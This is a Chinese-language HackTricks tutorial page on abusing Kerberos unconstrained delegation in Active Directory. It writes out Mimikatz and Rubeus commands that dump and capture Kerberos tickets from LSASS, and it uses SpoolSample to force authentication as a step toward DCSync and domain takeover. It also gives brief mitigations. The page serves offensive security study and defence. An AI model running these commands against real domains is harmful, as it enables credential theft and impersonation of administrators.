6.2 KiB
无限制委派
☁️ HackTricks云 ☁️ -🐦 推特 🐦 - 🎙️ Twitch 🎙️ - 🎥 YouTube 🎥
- 你在一家网络安全公司工作吗?你想在HackTricks中看到你的公司广告吗?或者你想获得PEASS的最新版本或下载PDF格式的HackTricks吗?请查看订阅计划!
- 发现我们的独家NFT收藏品The PEASS Family
- 获取官方PEASS和HackTricks周边产品
- 加入💬 Discord群组 或 Telegram群组 或 关注我在Twitter上的🐦@carlospolopm。
- 通过向hacktricks repo和hacktricks-cloud repo提交PR来分享你的黑客技巧。
无限制委派
这是域管理员可以设置给域内任何计算机的功能。然后,每当用户登录到计算机上时,该用户的TGT副本将被发送到DC提供的TGS中,并保存在LSASS的内存中。因此,如果您在计算机上具有管理员权限,您将能够转储票据并冒充用户在任何计算机上。
因此,如果域管理员在启用了"无限制委派"功能的计算机上登录,并且您在该计算机上具有本地管理员权限,则您将能够转储票据并在任何地方冒充域管理员(域提权)。
您可以通过检查userAccountControl属性是否包含ADS_UF_TRUSTED_FOR_DELEGATION来查找具有此属性的计算机对象。您可以使用LDAP过滤器'(userAccountControl:1.2.840.113556.1.4.803:=524288)'来执行此操作,这就是powerview所做的:
# 列出无限制计算机
## Powerview
Get-NetComputer -Unconstrained #DCs总是出现但对提权无用
## ADSearch
ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname,operatingsystem
# 使用Mimikatz导出票据
privilege::debug
sekurlsa::tickets /export #推荐的方法
kerberos::list /export #另一种方法
# 监视登录并导出新票据
.\Rubeus.exe monitor /targetuser:<username> /interval:10 #每10秒检查新的TGT使用Mimikatz或Rubeus将管理员(或受害者用户)的票据加载到内存中,进行传递票据攻击。
更多信息:https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/
有关无限制委派的更多信息,请参考ired.team。
强制认证
如果攻击者能够入侵允许"无限制委派"的计算机,他可以欺骗一个打印服务器自动登录该计算机,并将TGT保存在服务器的内存中。
然后,攻击者可以执行传递票据攻击以冒充用户打印服务器计算机账户。
要使打印服务器登录到任何计算机,您可以使用SpoolSample:
.\SpoolSample.exe <printmachine> <unconstrinedmachine>
如果TGT来自域控制器,您可以执行DCSync攻击并获取来自域控制器的所有哈希值。
在ired.team上了解更多关于此攻击的信息。
以下是其他尝试强制进行身份验证的方法:
{% content-ref url="printers-spooler-service-abuse.md" %} printers-spooler-service-abuse.md {% endcontent-ref %}
缓解措施
- 限制DA/Admin登录到特定服务
- 对特权帐户设置"帐户是敏感的,不能委派"
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- 您在网络安全公司工作吗?您想在HackTricks中看到您的公司广告吗?或者您想获得PEASS的最新版本或下载PDF格式的HackTricks吗?请查看订阅计划!
- 发现我们的独家NFT收藏品The PEASS Family
- 获取官方PEASS和HackTricks周边产品
- 加入💬 Discord群组或电报群组或关注我在Twitter上的🐦@carlospolopm。
- 通过向hacktricks repo和hacktricks-cloud repo提交PR来分享您的黑客技巧。